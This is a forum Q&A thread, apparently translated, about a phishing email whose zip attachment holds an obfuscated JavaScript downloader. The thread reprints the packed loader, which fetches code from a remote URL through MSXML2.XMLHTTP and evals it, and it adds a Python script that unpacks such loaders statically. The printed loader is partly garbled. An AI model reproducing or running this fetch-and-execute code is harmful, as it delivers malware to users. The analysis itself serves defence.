Malware
DanXai, 2016-06-28 21:00:56

What vulnerability does this trojan exploit?

Good day! Another trojan arrived in the corporate mail, with the following message body:

Good afternoon. We inform you that you have not paid the full amount for the services rendered (see the reports in the attachment). Please complete the settlement by Friday, otherwise penalties will automatically begin to accrue. If you have any questions about the attached documents, we are waiting for feedback.

Inside is a file named "Requisites_for_calculation (services) pdf.zip".
If you open the file in a text editor, you can see the PK header signature, and then some JS code follows:
/// 44bd2d8b8809da6d917416e1ff6cd9ab
/// 4754ac4cfd566dd8a504bbe8a0cded41
eval(function(c,e) ,a,b,d,f){d=function(a){return a.toString(36)};if(!"".replace(/^/,String)){for(;a--;) f[a.toString(e)]=b[a]||a.toString(e);b=[function(a){return f[a]}];d=function(){return"\\w+ "};a=1}for(;a--;)b[a]&&(c=c.replace(new RegExp("\\b"+d(a)+"\\b","g" ),b[a]));return c}('d 5=["ef","c","b://7.9","8","g"],a=ih(5[0 ]);a[5[3]](5[1],5[2],0);a[5[4]]();a[5[3]](5[1],a.6 ,0);a[5[4]]();j(a.6);',20,20,"_0xc332 ResponseText flexured open com http GET var MSXML2 XMLHTTP send ActiveXObject new eval".split(" "),
A34b1357c2cf94df8166efc8393669d3
/// /// 937512e44a4023a51be3472c93e14b06
/// a562cf96b2a9fdc3ae1ab0f5abd09baf
/// 70528b780de8760978cfb3cb56025709
/// 48767e01b9f7766c7536f4261d5effad
/// 7cfe91ef2168145f28bbbfe5df31110d
0, {}));
Link to virustotal: https://www.virustotal.com/en/file/7b66c3ad45b5394... ?????? - ?????? - ?? ?? 27-?? ???? 2016?. ??? ?? ? ????? ??????? ?? ???? ? ???????.??? ?? ? ???? ????.bb6ebce_txt_.js
The trojan was sent to the Kaspersky database. The question is, how does it actually work? How does a JS script get run? I opened the file in a virtual machine with the built-in Windows archiver; the system reported that the file was damaged.


2 answers
#algooptimize #bottize, 2016-06-28
@DanXai

Well, maybe it's damaged.
It seems that a request is being made somewhere, then the execution of the code received remotely is possible.
Too lazy to understand.
Save the clean code in a .js file and try to run it =)
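Rather than saving the code and running it, the safer way to answer "how does it work" is to undo the packing statically. The eval(function(c,e,a,b,d,f){...}) wrapper is the well-known p,a,c,k,e,r scheme: the quoted string is a sequence of base-20 tokens and the split(" ") list is the dictionary those tokens index, so a word-for-token substitution recovers the original source without executing a single line of it. The script below is an added example written for this thread (it is not the poster's file and not code from any answer). Because the dictionary as pasted above is extraction-damaged, it works on a constructed re-packing of the loader's visible word list, keeping the same variable name, domain and COM object, then inlines the string-table lookups and pulls out the indicators a responder would file.

```python
import re

# Dean Edwards "p,a,c,k,e,r" style payloads (the eval(function(p,a,c,k,e,d){...})
# wrapper seen in the question) are a plain word-for-token substitution. This is an
# added example, not code from the thread: it replays that substitution in Python so
# the loader can be read without ever handing it to a JavaScript engine.

BASE36 = "0123456789abcdefghijklmnopqrstuvwxyz"


def packer_code(n, radix):
    """Encode word index n the way the packer does (base `radix`, A-Z above 35)."""
    d = n % radix
    ch = chr(d + 29) if d > 35 else BASE36[d]
    return (packer_code(n // radix, radix) if n >= radix else "") + ch


def unpack(payload, radix, count, words):
    """Replace each \\w+ token in `payload` with its dictionary word.

    Mirrors the packer's own decoder: index i maps to words[i], or to the token
    itself when the dictionary entry is empty. Tokens outside the table are kept
    as-is rather than turning into "undefined" as the original decoder would.
    """
    table = {}
    for i in range(count):
        key = packer_code(i, radix)
        table[key] = words[i] if i < len(words) and words[i] else key
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), payload)


def resolve_string_array(src):
    """Inline NAME[N] lookups against a `var NAME=["...", ...]` string table."""
    decl = re.search(r'var\s+(\w+)\s*=\s*\[([^\]]*)\]', src)
    if not decl:
        return src
    name, items = decl.group(1), re.findall(r'"([^"]*)"', decl.group(2))

    def inline(m):
        idx = int(m.group(1))
        return '"%s"' % items[idx] if idx < len(items) else m.group(0)

    return re.sub(re.escape(name) + r"\[(\d+)\]", inline, src)


def indicators(src):
    """Pull out what a responder cares about: URLs, COM objects, use of eval."""
    return {
        "urls": sorted(set(re.findall(r"https?://[^\s\"'()]+", src))),
        "activex": sorted(set(re.findall(r'ActiveXObject\("([^"]+)"\)', src))),
        "uses_eval": bool(re.search(r"\beval\s*\(", src)),
    }


# Constructed sample: a consistent re-packing of the loader's visible word list.
# The dictionary pasted in the question is extraction-damaged, so this is a
# reconstruction for illustration, not a byte-exact decode of the attachment.
SAMPLE_RADIX = 20
SAMPLE_COUNT = 20
SAMPLE_WORDS = ("|||||_0xc332|ResponseText|flexured|MSXML2|XMLHTTP||http|var|open"
                "|send|com|GET|eval|new|ActiveXObject").split("|")
SAMPLE_PAYLOAD = ('c 5=["8.9","g","b://7.f","d","e"],a=i j(5[0]);a[5[3]](5[1],5[2],0);'
                  'a[5[4]]();a[5[3]](5[1],a.6,0);a[5[4]]();h(a.6);')


def analyse(payload=SAMPLE_PAYLOAD, radix=SAMPLE_RADIX, count=SAMPLE_COUNT, words=SAMPLE_WORDS):
    """Static pipeline: unpack -> inline the string table -> extract indicators."""
    decoded = unpack(payload, radix, count, words)
    readable = resolve_string_array(decoded)
    return decoded, readable, indicators(readable)


if __name__ == "__main__":
    decoded, readable, iocs = analyse()
    print("unpacked :", decoded)
    print("readable :", readable)
    print("iocs     :", iocs)
```

On this sample the readable form comes out as a WSH downloader: a new ActiveXObject("MSXML2.XMLHTTP") issues a GET to the hard-coded URL, sends a second GET to whatever the first response contains, and finally eval()s that second response. That is exactly the "request somewhere, then execute remotely fetched code" pattern guessed above, and it also explains why the file is inert in a browser: ActiveXObject only exists in the Windows Script Host, i.e. when the user double-clicks the .js. For a real sample, paste the packed string, radix, count and the split() list into unpack() and never let the output near wscript.exe.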

Rou1997, 2016-06-28
@Rou1997

None. It does not work in the browser; it is simply designed to be launched by the user.
